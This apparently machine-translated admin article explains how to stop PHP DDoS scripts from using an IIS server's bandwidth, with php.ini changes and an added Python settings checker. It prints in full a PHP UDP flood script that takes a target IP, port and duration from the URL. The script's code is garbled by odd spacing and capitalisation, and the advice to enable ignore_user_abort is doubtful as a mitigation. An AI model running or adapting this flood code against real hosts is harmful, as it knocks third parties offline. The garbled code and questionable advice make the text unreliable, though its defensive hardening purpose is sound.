A PHP DDoS script uses PHP code to open sockets and uses the server's own network connection to attack other IP addresses. I previously encountered this problem on Apache; today we will talk about how to prevent PHP DDoS scripts from occupying network bandwidth and server resources on IIS.
Common PHP DDoS code is as follows:
$ Packets = 0; $ Ip = $ _ GET ['IP']; $ Rand = $ _ GET ['Port']; Set_time_limit (0 ); Ignore_user_abort (FALSE ); $ Exec_time = $ _ GET ['time']; $ Time = time (); Print "Flooded: $ ip on port $ rand "; $ Max_time = $ time + $ exec_time; For ($ I = 0; I I <65535; $ I ++ ){ $ Out. = "X "; } While (1 ){ $ Packets ++; If (time ()> $ max_time ){ Break; }
$ Fp = fsockopen ("udp: // $ ip", $ rand, $ errno, $ errstr, 5 ); If ($ fp ){ Fwrite ($ fp, $ out ); Fclose ($ fp ); } } Echo "Packet complete ". time ('H: I: s '). "with $ packets (". round ($ packets * 65)/1024, 2 ). "mB) packets averaging ". round ($ packets/$ exec_time, 2 ). "packets/s n "; ?> |
Characteristics:
While IIS is running, the outbound bandwidth of the server is used up. That is to say, the server continuously sends packets to other hosts. This is different from being the target of a DDoS attack, where the server constantly receives a large number of packets.
Solution:
In c:\windows\php.ini, set the following value to Off:
allow_url_fopen = Off
And:
;extension=php_sockets.dll
The leading ; must be present. It comments the line out, which means php_sockets.dll is not loaded and the use of sockets is restricted.
Then:
;ignore_user_abort = On
Remove the leading ; from this line.
Then restart IIS.
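To confirm that the three php.ini settings above are actually in effect, the following Python check parses a php.ini and reports which of them are not in the state described on this page. It is an added example, not part of the original article; the function names and the two sample files are constructed for illustration.

```python
import re

# Values that PHP's ini parser treats as boolean false.
FALSE_VALUES = {"off", "0", "false", "no", "none", ""}

def active_settings(ini_text):
    """Return (directives, extensions) from lines that are not commented out."""
    directives, extensions = {}, []
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "[")):
            continue  # blank line, comment (leading ;) or section header
        name, sep, value = line.partition("=")
        if not sep:
            continue
        name = name.strip()
        value = value.split(";", 1)[0].strip().strip('"')  # drop inline comment
        if name == "extension":
            extensions.append(value.lower())
        else:
            directives[name] = value  # a later assignment overrides an earlier one
    return directives, extensions

def audit(ini_text):
    """List the settings from this page that are not in the recommended state."""
    directives, extensions = active_settings(ini_text)
    findings = []
    # If the directive is absent, PHP falls back to its built-in default (On).
    if directives.get("allow_url_fopen", "On").lower() not in FALSE_VALUES:
        findings.append("allow_url_fopen is not Off")
    # Matches php_sockets.dll with or without a directory, and the short form "sockets".
    if any(re.search(r"(^|[\\/])(php_)?sockets(\.dll)?$", e) for e in extensions):
        findings.append("sockets extension is still loaded")
    # If the directive is absent or commented out, the built-in default is Off.
    if directives.get("ignore_user_abort", "Off").lower() in FALSE_VALUES:
        findings.append("ignore_user_abort = On is not active")
    return findings

# Constructed sample files: one before and one after the changes on this page.
BEFORE = "[PHP]\nallow_url_fopen = On\nextension=php_sockets.dll\n;ignore_user_abort = On\n"
AFTER = "[PHP]\nallow_url_fopen = Off\n;extension=php_sockets.dll\nignore_user_abort = On\n"

if __name__ == "__main__":
    for label, text in (("before", BEFORE), ("after", AFTER)):
        print(label, audit(text) or "OK")
```

To check a real server, read the php.ini that IIS actually loads and pass its text to `audit()`.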
If the above method still does not work, you can disable the PHP extension in the list of extensions allowed in IIS.
NOTE: If your server does not need to run PHP, PHP can be disabled. If it is needed, you can disable php_sockets.dll. Another way is to block all UDP ports and open only some important ports, such as 80.